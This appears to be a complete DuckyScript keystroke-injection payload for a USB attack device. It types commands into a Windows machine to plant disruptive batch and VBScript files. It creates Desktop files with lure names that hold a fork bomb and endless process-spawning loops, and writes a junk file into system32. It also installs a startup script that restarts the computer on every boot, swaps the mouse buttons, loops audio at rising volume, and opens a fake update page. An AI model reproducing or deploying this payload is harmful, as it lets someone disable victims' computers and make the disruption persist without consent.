REN --> Starting cmd
DELAY 1000
GUI r
DELAY 1000
STRING cmd
ENTER
DELAY 1000
STRING cd Desktop
ENTER

REM --> Create FREE ROBUX.bat
STRING copy con "FREE ROBUX.bat"
ENTER
STRING @echo off
ENTER
STRING :start
ENTER
STRING start "FREE ROBUX.bat"
ENTER
STRING GOTO start
ENTER
CONTROL z
ENTER

REM --> Create FREE COOKIE.bat
STRING copy con "FREE COOKIE.bat"
ENTER
STRING start "" https://www.youtube.com/watch?v=dQw4w9WgXcQ
ENTER
CONTROL z
ENTER

REM --> Create PC Booster.bat
STRING copy con "PC Booster.bat"
ENTER
STRING %0|%0
CONTROL z
ENTER

REM --> Create ENTER Go Brrrr.bat
STRING copy con " ENTER Go Brrrr.bat"
ENTER
STRING Set wshShell = wscript.CreateObject("WScript.Shell")
ENTER
STRING  do
ENTER
STRING  wscript.sleep 100
ENTER
STRING  wshshell.sendkeys "~(enter)"
ENTER
STRING  loop
ENTER
CONTROL z
ENTER

REM --> Create CMD GO BRRRR.bat
STRING copy con "CMD GO BRRRR.bat"
ENTER
STRING @echo off
ENTER
STRING cd /d %SystemRoot%\system32
ENTER
STRING echo its just a prank bro>hal.dll
ENTER
STRING :a
ENTER
STRING start
ENTER
STRING goto a
ENTER
CONTROL z
ENTER




REM --> FUCKED

REM --> Create Shutdown.bat 
STRING copy con "%userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Shutdown.bat"
STRING @echo off
ENTER
STRING shutdown /r /t 30
REM The shutdown command has many good options '/t' adds a Delay, and '/r' restarts
REM '/s' will shut the computer down and '/l' (L) is to just logoff the user more options are available by running 'shutdown /?'
ENTER
CTRL z

REM --> Switch RightLeft Click
STRING Rundll32 User32 , SwapMouseButton
ENTER

REM --> RickRoll
STRING del %tmp%\rickyou.vbs
ENTER
DELAY 200
STRING del %tmp%\volup.vbs
ENTER
DELAY 200
STRING cd %tmp% && copy con rickyou.vbs
ENTER
STRING While true
ENTER
STRING Dim oPlayer
ENTER
STRING Set oPlayer = CreateObject("WMPlayer.OCX")
ENTER
STRING oPlayer.URL = "http://tinyurl.com/s63ve48"
ENTER
STRING oPlayer.controls.play
ENTER
STRING While oPlayer.playState <> 1 ' 1 = Stopped
ENTER
STRING WScript.Sleep 100
ENTER
STRING Wend
ENTER
STRING oPlayer.close
ENTER
STRING Wend
ENTER
DELAY 100
CTRL z
ENTER
STRING copy con volup.vbs
ENTER
STRING do
ENTER
STRING Set WshShell = CreateObject("WScript.Shell")
ENTER
STRING WshShell.SendKeys(chr(&hAF))
ENTER
STRING loop
ENTER
CTRL z
ENTER
STRING start rickyou.vbs && volup.vbs
ENTER
STRING exit
ENTER

REM --> fake update LUL
GUI r
DELAY 500
STRING iexplore -k http://fakeupdate.net/win10/index.html
ENTER